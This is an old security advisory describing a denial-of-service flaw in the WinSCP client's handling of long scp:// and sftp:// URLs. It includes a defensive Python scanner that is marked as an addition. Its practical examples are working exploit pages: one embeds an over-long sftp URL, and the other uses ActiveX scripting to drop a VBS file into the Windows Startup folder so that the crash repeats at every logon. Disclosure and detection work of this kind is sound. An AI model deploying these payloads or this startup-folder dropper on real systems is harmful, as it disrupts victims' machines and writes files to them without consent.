
WinSCP DoS
WinSCP Denial of Service



Package:       WinSCP
Auth:          http://winscp.sourceforge.net
Version(s):    3.5.6 (maybe also prior versions are vulnerable)
Vulnerability: Denial of Service









What’s WinSCP:



“WinSCP is an open source SFTP (SSH File Transfer Protocol) and
SCP (Secure CoPy) client for Windows using SSH (Secure SHell).
Its main function is safe copying of files between a local and
a remote computer.”







Vulnerability Description:



A default installation of WinSCP provides the user with
functionality to handle sftp:// and scp:// addresses.
The vulnerability exists due to the way the application
handles long URLs. A malformed scp:// or sftp:// address
embedded in an HTML tag causes the WinSCP application to
exhaust CPU and memory resources.
The attacker would need to convince the user to visit a
web site he controls or to open an HTML e-mail he has
prepared. During the denial of service, WinSCP will not
display any GUI.
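
A defensive check for the condition described above, as an added example that is not part of the original advisory: it scans HTML (for instance at a mail gateway or web proxy) for scp:// or sftp:// addresses in any tag attribute and reports those above a length limit. The 255-character limit, the function and class names, and the sample input are assumptions; the advisory does not state the length that triggers the problem.

```python
import re
from html.parser import HTMLParser

# Assumed threshold: the advisory gives no exact trigger length, so this
# limit is a policy choice for the filter, not a property of WinSCP.
MAX_URL_LEN = 255

# scp:// or sftp:// anywhere inside an attribute value, so a URL that is
# preceded by other text (such as "URL=sftp://...") is matched as well.
URL_RE = re.compile(r"\b(?:scp|sftp)://[^\s\"'<>]*", re.IGNORECASE)


class HandlerUrlScanner(HTMLParser):
    """Collect scp:// and sftp:// URLs found in any tag attribute."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []  # (tag, attribute, scheme, url_length)

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            # Attributes without a value arrive as None.
            for match in URL_RE.finditer(value or ""):
                url = match.group(0)
                scheme = url.split(":", 1)[0].lower()
                self.findings.append((tag, name, scheme, len(url)))


def scan_html(html, max_len=MAX_URL_LEN):
    """Return the findings whose URL is longer than max_len."""
    scanner = HandlerUrlScanner()
    scanner.feed(html)
    scanner.close()
    return [f for f in scanner.findings if f[3] > max_len]


# Constructed sample input: one ordinary link and one over-long address.
SAMPLE = (
    "<html><body>"
    '<a href="sftp://files.example.com/pub/">mirror</a>'
    '<img src="SCP://' + "A" * 600 + '">'
    "</body></html>"
)

if __name__ == "__main__":
    for tag, attr, scheme, length in scan_html(SAMPLE):
        print(f"over-long {scheme}:// URL ({length} chars) in <{tag} {attr}=...>")
```
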







Goal:



An attacker may use this flaw to prevent the users of the
attacked host from working properly.







Practical Examples:



------ WinSCP_DoS1.html  --------







WinSCP DoS



URL=sftp://AAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">













----------------------------------





-------- WinSCP_DoS2.html  -------





  

  WinSCP DoS

   

    <script language="JScript">



     var WshShell = new ActiveXObject("WScript.Shell");

     strSU = WshShell.SpecialFolders("StartUp");

 

     var fso = new ActiveXObject("Scripting.FileSystemObject");

     var vibas = fso.CreateTextFile(strSU + "\\WinSCPDoS.vbs",true);

      

     vibas.WriteLine("Dim shell");

     vibas.WriteLine("Dim quote");

     vibas.WriteLine("Dim DoS");

     vibas.WriteLine("Dim param");

     vibas.WriteLine("DoS = \"C:\\Programmi\\WinSCP3\\WinSCP3.exe\"");

     vibas.WriteLine("param = \"scp://AAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"");

     vibas.WriteLine("set shell = WScript.CreateObject(\"WScript.Shell\")");

     vibas.WriteLine("quote = Chr(34)");

     vibas.WriteLine("pgm = \"explorer\"");

     vibas.WriteLine("shell.Run quote & DoS & quote & \" \" & param");

	 

     vibas.Close();

     

    </script>



  





----------------------------------













Credits:

-- 



Luca Ercoli	

Seeweb		http://www.seeweb.com 
